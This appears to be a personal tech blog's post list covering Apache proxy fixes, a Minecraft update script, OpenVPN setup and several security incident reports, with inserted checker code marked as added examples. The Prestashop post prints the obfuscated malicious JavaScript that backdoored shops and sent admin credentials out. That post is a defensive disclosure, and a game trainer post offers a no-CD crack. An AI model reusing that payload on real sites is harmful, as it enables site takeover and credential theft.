Author: kevin

  • Apache 2.4.64, SNI, and 421 Misdirected Request: cause and fix

    After upgrading to Apache 2.4.64 (or after applying Linux vendor updates), many sites behind a reverse proxy started returning 421 Misdirected Request. The practical cause is simple: when your proxy makes an HTTPS connection to Apache, Apache now expects a TLS SNI value that matches the HTTP Host header. If the proxy omits SNI, or sends a different name than the Host header, Apache can reject the request with 421. This change exposed default proxy settings that used to work by accident.

    What the 421 error means

    The HTTP 421 Misdirected Request status means the request reached a server that is not configured to respond for the scheme and authority combination you used. Browsers often reuse HTTP/2 connections across hosts if the server allows it, but Apache 2.4.64 tightened the checks so that connections without a matching SNI and Host are rejected. That is why you may see the error only on some requests, or only on some subdomains, after the update. Apache returns this message:

    Misdirected Request

    The client needs a new connection for this request as the requested host name does not match the Server Name Indication (SNI) in use for this connection.

    Who is affected

    You are affected if a reverse proxy connects to Apache over HTTPS and does not pass SNI to the backend. This is common for nginx in front of Apache, HAProxy with HTTPS backends, and some CDNs or load balancers that re-encrypt to the origin. Panels that pair nginx and Apache (for example EA-Nginx on cPanel, Plesk, Hestia, and similar) were among the first to report 421 after the update.

    Fix: send the correct SNI to Apache and keep it consistent with Host

    The fix is to enable SNI on the upstream HTTPS hop and make its value match the HTTP Host that Apache should serve. Keep the connection private (VPC, VLAN, VPN, or same host) if you do not want the name visible outside your network. Do not roll back the Apache security update. Configure your proxy once and the 421 errors stop.

    nginx to Apache over HTTPS

    Enable SNI toward the backend and keep Host consistent.

    location / {
        proxy_pass              https://backend.example.com;
        proxy_set_header        Host $host;
        proxy_ssl_server_name   on;      # send SNI
        proxy_ssl_name          $host;   # SNI value
    [..]
    }
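    To catch the nginx misconfiguration described above before Apache answers 421, here is an added check (example code, not from the post): it parses nginx location blocks and flags an https proxy_pass that does not send SNI, or whose proxy_ssl_name differs from the Host header nginx forwards. The sample configs are constructed for illustration.

```python
"""Lint nginx location blocks for the SNI/Host mismatch behind Apache 421.

Added example, not from the original post. nginx defaults are assumed:
Host defaults to $proxy_host, proxy_ssl_name defaults to $proxy_host, and
proxy_ssl_server_name defaults to off.
"""
import re

DIRECTIVE = re.compile(r"\s*([a-z_]+)\s+([^;]*?)\s*;", re.S)

def strip_comments(text):
    return "\n".join(line.split("#", 1)[0] for line in text.splitlines())

def location_blocks(conf):
    """Yield (location, body) for each location { ... } block."""
    text = strip_comments(conf)
    for m in re.finditer(r"location\s+([^{]+?)\s*\{", text):
        depth, i = 1, m.end()
        while depth and i < len(text):
            depth += {"{": 1, "}": -1}.get(text[i], 0)
            i += 1
        yield m.group(1).strip(), text[m.end():i - 1]

def directives(body):
    d = {}
    for name, args in DIRECTIVE.findall(body):
        d.setdefault(name, []).append(args.strip())
    return d

def check_location(loc, body):
    """Return findings for one location block (empty list when consistent)."""
    d = directives(body)
    findings = []
    for target in d.get("proxy_pass", []):
        if not target.startswith("https://"):
            continue  # plain-http upstream: no TLS hop, SNI does not apply
        host = next((a.split(None, 1)[1] for a in d.get("proxy_set_header", [])
                     if a.split(None, 1)[0].lower() == "host"), "$proxy_host")
        if d.get("proxy_ssl_server_name", ["off"])[-1] != "on":
            findings.append(f"{loc}: https upstream without proxy_ssl_server_name on")
            continue
        sni = d.get("proxy_ssl_name", ["$proxy_host"])[-1]
        if sni != host:  # Apache picks the vhost by SNI, then checks Host
            findings.append(f"{loc}: SNI {sni} differs from Host {host}")
    return findings

def lint(conf):
    out = []
    for loc, body in location_blocks(conf):
        out.extend(check_location(loc, body))
    return out

# Constructed samples: the pre-2.4.64 "works by accident" block and the fixed one.
BROKEN = """location / {
    proxy_pass       https://backend.example.com;
    proxy_set_header Host $host;
}"""
FIXED = """location / {
    proxy_pass              https://backend.example.com;
    proxy_set_header        Host $host;
    proxy_ssl_server_name   on;      # send SNI
    proxy_ssl_name          $host;   # SNI value
}"""
MISMATCH = FIXED.replace("proxy_ssl_name          $host;", "proxy_ssl_name $proxy_host;")
```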

    HAProxy to Apache over HTTPS

    Pass the Host header as the SNI value on the TLS connection to Apache. Add verification settings that match your policy.

    backend app
        http-request set-header X-Forwarded-Proto https
        server app1 127.0.0.1:443 ssl sni req.hdr(Host)

    Apache to Apache with mod_proxy over HTTPS

    Use an https URL whose hostname is the site you want to serve so that Apache sends that name as SNI to the backend.

    SSLProxyEngine on
    ProxyPass        / https://site.example.com/
    ProxyPassReverse / https://site.example.com/

    How to test and confirm

    From the proxy host, curl the backend using the public hostname and the backend IP to confirm that SNI and Host agree. Watch your Apache error log for messages about missing SNI or a vhost mismatch while you test.

    curl -vk https://example.com/ --resolve example.com:443:127.0.0.1

    FAQ

    The 421 you see is produced by the stricter SNI and authority checks added around 2.4.64 and enforced by HTTP/2 handling. The cure is to send a correct SNI on the upstream connection and keep it consistent with Host.

    Do I need to verify the backend certificate for SNI to matter? No. Apache uses SNI during the TLS handshake to pick the correct SSL vhost and certificate before it even reads the HTTP request. Certificate verification by the proxy is a separate operational choice. The important part for avoiding 421 is that the SNI you send and the Host header you send resolve to the same Apache vhost.

  • Minecraft Linux Server Auto-Update

    Keeping your Minecraft Bedrock Dedicated Server up to date is essential for performance, stability, and player compatibility. In this guide, we’ll show you how to set up a lightweight Bash script that checks for new server versions and installs them, all while preserving your world and configuration files.

    Step 1: Install Dependencies

    sudo apt update
    sudo apt install curl jq unzip rsync wget

    Step 2: Create the Update Script

    Save the following as ~/update-bedrock.sh:

    #!/usr/bin/env bash
    set -euo pipefail
    
    HOME_DIR="$HOME"
    INSTALL_DIR="$HOME_DIR/bedrock-server"
    TMP_DIR="$HOME_DIR/bedrock-tmp"
    API_URL="https://net-secondary.web.minecraft-services.net/api/v1.0/download/links"
    ZIP_NAME="bedrock.zip"
    
    command -v jq >/dev/null || { echo "jq is required"; exit 1; }
    
    echo "Fetching version info..."
    DATA=$(curl -fsSL "$API_URL")
    DOWNLOAD_URL=$(echo "$DATA" | jq -r '.result.links[] | select(.downloadType == "serverBedrockLinux") | .downloadUrl')
    # Take the dotted version number out of the file name (e.g. 1.21.44.01), without a trailing dot
    VERSION=$(basename "$DOWNLOAD_URL" | grep -oE '[0-9]+(\.[0-9]+)+' | head -n 1)
    
    [[ -z "$DOWNLOAD_URL" || -z "$VERSION" ]] && { echo "Failed to extract URL/version"; exit 1; }
    
    [[ -f "$INSTALL_DIR/bedrock-server.version" && "$(cat "$INSTALL_DIR/bedrock-server.version")" == "$VERSION" ]] && {
      echo "Already up to date"
      exit 0
    }
    
    mkdir -p "$TMP_DIR"
    wget -q -O "$TMP_DIR/$ZIP_NAME" "$DOWNLOAD_URL"
    unzip -t "$TMP_DIR/$ZIP_NAME" >/dev/null || { echo "ZIP test failed"; exit 1; }
    unzip -oq "$TMP_DIR/$ZIP_NAME" -d "$TMP_DIR/unpacked"
    
    [[ -x "$TMP_DIR/unpacked/bedrock_server" ]] || { echo "Missing server binary"; exit 1; }
    
    rsync -a --delete \
      --exclude='server.properties' \
      --exclude='permissions.json' \
      --exclude='whitelist.json' \
      --exclude='ops.json' \
      --exclude='allowlist.json' \
      --exclude='valid_known_packs.json' \
      --exclude='worlds/' \
      "$TMP_DIR/unpacked/" "$INSTALL_DIR/"
    
    echo "$VERSION" > "$INSTALL_DIR/bedrock-server.version"
    rm -rf "$TMP_DIR"
    echo "Updated to version $VERSION"
    

    Step 3: Make It Executable

    chmod +x ~/update-bedrock.sh

    Step 4: Automate with Cron (Optional)

    Edit your crontab with crontab -e and add this line to check daily at 3 AM:

    0 3 * * * ~/update-bedrock.sh >> ~/bedrock-update.log 2>&1

    Done ✅

    You now have a self-maintaining Minecraft Bedrock server that stays updated automatically!

  • Premier Manager 97 98 / PC Futbol 5 6 Trainer

    This is a trainer I made a long time ago with a friend for the PC Futbol / Premier Manager series. I plan on adding more to it every time I find time 🙂

    If you have suggestions, please leave them in the comments!

    Here is the list of features:

    • No CD fix/crack(PM 98, PCF 5, PCF 6)
    • Remove free space errors (PM 97, PM 98)
    • Unlimited transfers at a time (PM 97)
    • Sign/align unlimited extra comm players (PM 97, PM 98, PCF 5, PCF 6)
    • Sign players from teams with few players (fixes the bug known as the “Romario bug”) (PM 97)
    • Players/Clubs always accept transfer offers (PM 97, PCF 5)
    • Scout search less restrictive (PM 97)

    Download latest version:

    Note: In Premier Manager 98 if you get the error “the game can’t be saved”, because you didn’t use the installer, you just need to create the folder “TACTICS” in the game folder.

    Changelog:

    Version 0.14

    Added “Sign unlimited extra-comm players” for Premier Manager 98

    Added “Align unlimited extra-comm players” for Premier Manager 98

    Version 0.13

    Added “No CD check” for Premier Manager 98

    Added “Remove free space errors” for Premier Manager 98

    Version 0.12

    Initial release

  • Check Akismet queue offline

    If you need to run Akismet on a big queue, you can do it with this code from the command line. Drop it at the root of your WordPress install (the folder that contains wp-config.php) and run it with the command-line php binary.

    <?php
    // Bootstrap WordPress so the Akismet plugin classes are available.
    require_once dirname(__FILE__) . '/wp-load.php';
    if (!function_exists('get_plugins')) {
        require_once ABSPATH . 'wp-admin/includes/plugin.php';
    }
    require ABSPATH . 'wp-content/plugins/akismet/class.akismet-admin.php';
    // Mimic the request the admin panel sends when it asks for a recheck.
    $_GET['recheckqueue'] = true;
    $_REQUEST['action'] = 'akismet_recheck_queue';
    $zz = new Akismet_Admin();
    $zz->recheck_queue();
    // Delete this file once you are done: it lives in the web root.
    ?>

    (Edit: this shouldn’t be needed in newer versions of Akismet as you can do it from the panel).

  • Hotmail security hole plugged silently, no communication, no customer service

    A vulnerability in the Hotmail password reset pages, which allowed hackers to get access to ANY Hotmail/MSN account, has been widely exploited over the past week.

    I found a video on YouTube dated April 12 that describes the security hole. It is trivial and only needs the modification of one email field during a request to the password reset page; when exploited, the password reset link is then sent to an arbitrary email.

    My MSN/passport.net accounts (and those of many of my contacts) were briefly hacked during the night from April 17 to April 18. I then informed MSRC about an unknown vulnerability in the password reset page, and it seems the vulnerability was plugged on April 19 or 20.

    What surprises me is Microsoft's communication: there has been no public statement about the vulnerability, and all the hacked accounts have been permanently blocked and need to be unblocked manually by Microsoft employees. Some have been unblocked after asking on the answers.microsoft.com forums, but thousands remain blocked (no password reset, whether through email, SMS or customer service, helps).

    We are on April 24 and most of the users don't even know this is Microsoft's fault, and I'm surprised they didn't bother to help the hacked customers get their accounts back. This is another big disappointment about Microsoft's security, communication and ethics.

    Other sites talking about the vulnerability:

    http://syria.telecomix.org/

    http://www.whitec0de.com/new-hotmail-exploit-can-get-any-hotmail-email-account-hacked-for-just-20/

    http://hackingworldnews.blogspot.fr/2012/04/yet-another-hotmail-exploit-for-avril.html

     

    UPDATE 26/04:

    MSRC tweeted about the fix:

    https://twitter.com/#!/msftsecresponse/status/195568235654021121

    I got my account back after contacting customer service. For this you need to follow the link on the page saying you're blocked, and then log in with a new (unblocked) account. The mess ended. At least, let's hope so.

    Here is the direct link to the correct support page:

    http://windows.microsoft.com/en-us/windows-live/get-support?selectedproduct=Hotmail&selectedissue=Your%20account%20has%20been%20temporarily%20blocked&productKey=wolmain

  • Thepiratebay.se links blocked in MSN Messenger

    UPDATE 28/03/2012: The Register has published an article about it, and it seems MS decided to unban thepiratebay!

    http://www.theregister.co.uk/2012/03/26/microsoft_censors_pirate_bay_im/

    --------

    It looks like thepiratebay.se links are blocked in MSN Messenger: anybody who tries to send a link, even to the homepage, gets back an error:

    I'd be curious to know whether it has been mistakenly categorized as a site containing viruses or whether it was a move by Microsoft to "hit" thepiratebay and the revenue it generates from visits.

  • Alvotech Vserver VPS with OpenVPN

    Renting a server at Alvotech and thinking about installing OpenVPN? Then follow this tutorial.

    This tutorial was done on the default configuration of the Alvotech VPS, Debian 5 64-bit, and on Debian 6 64-bit.

    The specs page of the vservers shows that TUN/TAP is usable, but when you rent the VPS, no TUN interface is enabled.

    The first thing to do is ask support to enable it; after they say they did, you need to reboot your server through the control panel.

    Note that you don't need any iptables rule: IP forwarding is enabled, and you cannot add any iptables rule anyway, since Alvotech enables the necessary rules on the host.

    Then log in to your server over SSH and check ifconfig; you should see something like this:

    tun2391-136 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
    inet addr:10.0.2.97 P-t-P:10.0.2.98 Mask:255.255.255.255
    UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
    RX packets:11782 errors:0 dropped:0 overruns:0 frame:0
    TX packets:8389 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:100
    RX bytes:1258182 (1.1 MiB) TX bytes:5467118 (5.2 MiB)

    Great, now do:

    apt-get install openvpn

    cd /etc/openvpn

    mkdir easy-rsa

    cp -r /usr/share/doc/openvpn/examples/easy-rsa/* easy-rsa/

    cd easy-rsa/2.0/

    source ./vars

    ./clean-all

    ./build-key-server server

    ./build-key client1

    ./build-dh

    ln -s /etc/openvpn/easy-rsa/2.0/keys /etc/openvpn/keys

    cd /etc/openvpn

    Now create a file server.conf with this content:

    port 1194
    proto udp
    dev tun2391-136 #Your TUN device in ifconfig
    ifconfig 10.0.2.97 10.0.2.98 # your TUN interface settings in ifconfig
    ifconfig-noexec
    route-noexec
    keepalive 10 120
    persist-key
    persist-tun
    comp-lzo
    verb 3
    fragment 1200
    mssfix 1200
    ca keys/ca.crt
    cert keys/server.crt
    key keys/server.key
    dh keys/dh1024.pem
    user nobody
    group nogroup
    tls-server
    push "dhcp-option DNS 8.8.8.8"

    Restart openvpn:

    /etc/init.d/openvpn restart

    Now copy ca.crt, client1.crt and client1.key to your client, and create a client.conf file (or client.ovpn) with this content:

    client
    dev tun
    proto udp
    remote 88.88.88.88 1194 #your server ip address/port
    resolv-retry infinite
    nobind
    persist-key
    persist-tun
    ca ca.crt
    cert client1.crt
    key client1.key
    ns-cert-type server
    comp-lzo
    verb 3
    ifconfig 10.0.2.98 10.0.2.97 #change it according to the IPs of your TUN interface, notice it is the CONTRARY of the server config
    redirect-gateway
    fragment 1200
    mssfix 1200

    And now just run "sudo openvpn client.conf". On Windows you might need to adjust the paths to something like "cert c:\\Users\\admin\\desktop\\client1.crt" (for the key and certificates).

    If you need another client to connect, just ask support for another TUN device (they added one on my server), copy server.conf to server2.conf, change the TUN interface name and IPs plus the OpenVPN port in server2.conf, and don't forget to generate a second client certificate!

    Enjoy!

    (thanks to the support @ Alvotech for providing the details I was missing)
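    Because the client ifconfig line has to be the reverse of the server's and the two files must agree on port, protocol and fragment settings, here is an added consistency check (example code, not from the post) that parses a server.conf and client.conf pair and compares them against the ifconfig output; the sample configs below are constructed from the values used in this tutorial.

```python
"""Cross-check an OpenVPN server.conf / client.conf pair for this setup.

Added example, not part of the original post. Verifies that the client
ifconfig is the reverse of the server's, that the server ifconfig matches
the TUN addresses shown by ifconfig, that the client 'remote' port equals
the server 'port', and that proto/fragment/mssfix agree on both sides.
"""
import re

def parse_conf(text):
    """Map each OpenVPN directive to its list of argument lists ('#' starts a comment)."""
    conf = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            key, *args = line.split()
            conf.setdefault(key, []).append(args)
    return conf

def check_pair(server_text, client_text, ifconfig_text):
    """Return a list of problems; an empty list means the pair is consistent."""
    srv, cli = parse_conf(server_text), parse_conf(client_text)
    problems = []
    dev = srv["dev"][0][0]
    if not re.search(rf"^{re.escape(dev)}\b", ifconfig_text, re.M):
        problems.append(f"server dev {dev} not present in ifconfig output")
    s_local, s_remote = srv["ifconfig"][0]
    c_local, c_remote = cli["ifconfig"][0]
    m = re.search(r"inet addr:(\S+) P-t-P:(\S+)", ifconfig_text)
    if m and (m.group(1), m.group(2)) != (s_local, s_remote):
        problems.append("server ifconfig does not match the TUN addresses in ifconfig")
    if (c_local, c_remote) != (s_remote, s_local):
        problems.append("client ifconfig must be the reverse of the server's")
    port = srv["port"][0][0]
    if cli["remote"][0][1] != port:
        problems.append(f"client remote port {cli['remote'][0][1]} != server port {port}")
    for key in ("proto", "fragment", "mssfix"):
        if srv.get(key) != cli.get(key):
            problems.append(f"{key} differs between server and client")
    return problems

# Constructed samples built from the tutorial's values.
SERVER = """port 1194
proto udp
dev tun2391-136 #Your TUN device in ifconfig
ifconfig 10.0.2.97 10.0.2.98
fragment 1200
mssfix 1200
"""
CLIENT = """client
dev tun
proto udp
remote 88.88.88.88 1194 #your server ip address/port
ifconfig 10.0.2.98 10.0.2.97
fragment 1200
mssfix 1200
"""
IFCONFIG = """tun2391-136 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:10.0.2.97 P-t-P:10.0.2.98 Mask:255.255.255.255
"""
# Common mistake: pasting the server's ifconfig line into the client unchanged.
CLIENT_COPIED = CLIENT.replace("ifconfig 10.0.2.98 10.0.2.97", "ifconfig 10.0.2.97 10.0.2.98")
```

    Note that ns-cert-type in client.conf was deprecated in OpenVPN 2.4 and removed in 2.5, where remote-cert-tls server is the replacement.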

  • Vshare / Widdit / searchcompletion.com Adware

    The Vshare plugin *IS* adware.

    Whether you are on Mac, Windows or Linux it is the same, and you don't even need the toolbar, only the plugin.

    I installed the old version of the Vshare plugin in my Firefox on Linux (old version because the newest isn't available on Linux). Then some popups started to appear on sites like wikipedia.org, loaded from files hosted on widdit.com and leading to search.searchcompletion.com (a quick lookup on Google shows some Windows users also see this site as their browser home page after installing Vshare).

    Widdit belongs to an Israeli company (SimplyGen), and so does Vshare. Maybe both sites are from the same company.

    At this point I don't know if it only adds some random popups or also does other nasty things (like replacing ads). I didn't read any other article on the subject, so I decided to write this post. If you have other info, post it in the comments!

  • Prestashop XSS Worm (footer.tpl virus)

    Today I woke up and connected to a Prestashop site I'm setting up.
    I didn't install anything extra on it (only my custom template), and it wasn't in search engines either.
    I noticed a strange blank line in the footer.. DOH!

    When I looked, I had this code in the footer:

    <script>String.prototype.asd=function(){return String.fromCharCode;};
    Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}
    catch(q){zxc={}[i];}v=document.createTextNode('asd');
    var s="";for(i in v)if(i=='childNodes')o=v[i].length+1;o*=2;e=eval;
    m=[120-o,99-o,116-o,34-o,102-o,34-o,63-o,34-o,112-o,103-o,121-o,34-o
    ,70-o,99-o,118-o,103-o,42-o,43-o,61-o,120-o,99-o,116-o,
    34-o,122-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,
    113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,79-o,99-o,
    118-o,106-o,48-o,104-o,110-o,113-o,113-o,116-o
    ,42-o,102-o,48-o,105-o,103-o,118-o,70-o,
    99-o,118-o,103-o,42-o,43-o,49-o,52-o,43-o,45-o,59-o,57-o,
    43-o,61-o,34-o,120-o,99-o,116-o,
    34-o,123-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,
    104-o,116-o,113-o,111-o,69-o,106-o,
    99-o,116-o,69-o,113-o,102-o,103-o,42-o,102-o,48-o,105-o
    ,103-o,118-o,74-o,113-o,119-o,116-o,
    117-o,42-o,43-o,45-o,59-o,57-o,43-o,61-o,102-o,113-o,101-o
    ,119-o,111-o,103-o,112-o,118-o,
    48-o,121-o,116-o,107-o,118-o,103-o,42-o,36-o,62-o,107-o,104-o
    ,116-o,99-o,111-o,103-o,34-o,
    117-o,116-o,101-o,63-o,41-o,106-o,118-o,118-o,114-o,60-o,49-o,
    49-o,101-o,110-o,107-o,101-o,
    109-o,111-o,103-o,36-o,45-o,122-o,45-o,123-o,45-o,36-o,48-o,104-o,
    107-o,110-o,103-o,99-o,120-o,103-o,48-o,101-o,113-o,111-o,
    41-o,34-o,121-o,107-o,102-o,118-o,
    106-o,63-o,50-o,34-o,106-o,103-o,107-o,105-o,106-o,118-o,63-o,
    50-o,64-o,36-o,43-o,61-o];
    mm=''.asd();for(i=0;i<m.length;i++)s+=mm(e("m"+"["+"i"+"]"));e(s);</script>

    And this in footer.tpl was causing it:

    {literal}base64_decode("<base64 blob omitted: the encoded form of the script shown above>"){/literal}

    Also 2 PHP files were created in the upload/ and download/ folders, with a creation time set to the exact time I logged into the back office this morning!

    Apparently, Prestashop.com got compromised and somebody inserted a malicious script, which was executed in any admin's browser window and made them backdoor their own site.

    All the infected shops employees’ credentials were sent to these malicious emails: samuvel_hitroy@aol.com and preop@gmx.com

    The fix:
    Be sure to delete modules/her.php.
    Remove the JavaScript code at the end of your footer.tpl theme files.
    Be sure to create these folders:
    tools/smarty/compile/
    tools/smarty/cache/

    Put back the .htaccess files of upload/ and download/.

    You can clear *.php files from upload/ and download/.

    Clear ALL your cache.
    Move your admin folder.
    Reset your MySQL password.
    Reset all your employees' passwords!
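    To check a shop for the traces listed in the fix above, here is an added scanner (example code, not from the post and not Prestashop's own cleanup tool): it looks for modules/her.php, injected footer.tpl files, stray PHP files and missing .htaccess in upload/ and download/, and the two missing Smarty folders; the sample tree it builds is constructed for illustration.

```python
"""Scan a PrestaShop tree for the traces this post's fix section lists.

Added example, not from the original post. Paths are the ones the post
names; the infected sample tree is constructed in a temporary directory.
"""
import os, re, tempfile

# Markers of the injected footer: the literal base64 wrapper or the script's own prologue.
INJECT = re.compile(r"\{literal\}\s*base64_decode\(|String\.prototype\.asd")

def scan_shop(root):
    """Return a sorted list of findings for the shop rooted at `root`."""
    hits = []
    if os.path.isfile(os.path.join(root, "modules", "her.php")):
        hits.append("backdoor file modules/her.php present")
    for folder in ("upload", "download"):
        path = os.path.join(root, folder)
        if not os.path.isdir(path):
            continue
        if not os.path.isfile(os.path.join(path, ".htaccess")):
            hits.append(f"{folder}/.htaccess missing")
        for name in sorted(os.listdir(path)):
            if name.lower().endswith(".php"):
                hits.append(f"PHP file in {folder}/: {name}")
    for folder in ("tools/smarty/compile", "tools/smarty/cache"):
        if not os.path.isdir(os.path.join(root, folder)):
            hits.append(f"{folder}/ missing")
    for dirpath, _, files in os.walk(os.path.join(root, "themes")):
        for name in files:
            if name != "footer.tpl":
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as f:
                if INJECT.search(f.read()):
                    hits.append(f"injected script in {os.path.relpath(full, root)}")
    return sorted(hits)

def build_sample_shop():
    """Constructed infected tree for demonstration; returns its root path."""
    root = tempfile.mkdtemp()
    for d in ("modules", "upload", "download", "themes/default"):
        os.makedirs(os.path.join(root, d))
    open(os.path.join(root, "modules", "her.php"), "w").close()      # backdoor
    open(os.path.join(root, "upload", "x1.php"), "w").close()        # dropped file
    open(os.path.join(root, "download", ".htaccess"), "w").close()   # this one survived
    with open(os.path.join(root, "themes", "default", "footer.tpl"), "w") as f:
        f.write('</div>\n{literal}base64_decode("PHNjcmlwdD4="){/literal}\n')  # constructed
    return root
```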

    The vulnerability has been fixed on prestashop.com.

    This shows how including external content (HTML) is really risky and should be avoided at all costs. External content should always be parsed and displayed safely.

    More information on this thread:
    http://www.prestashop.com/forums/topic/125798-footertpl-vulnerability/

    UPDATE: Prestashop has published an official statement and published a tool to clean an infected site:

    http://www.prestashop.com/blog/article/please_read_security_procedure/

  • xauth + (X11Forwarding Yes and X11UseLocalhost yes) == Still no Forwarding ?

    I was searching for this fix for quite some time. I couldn't forward X anymore using "ssh -Y" or "ssh -X" on my Debian server (I have xauth installed); I was always getting this error:

    ~$ xterm
    xterm Xt error: Can't open display:
    xterm:  DISPLAY is not set

    "X11UseLocalhost no" made it work, but this wasn't the right solution..

    In this bug report I found out I had the same problem and the same symptoms: I had disabled IPv6 support, and this is what broke the forwarding!

    The solution is to add:

    AddressFamily inet

    in sshd_config! (or enable IPv6 again ;))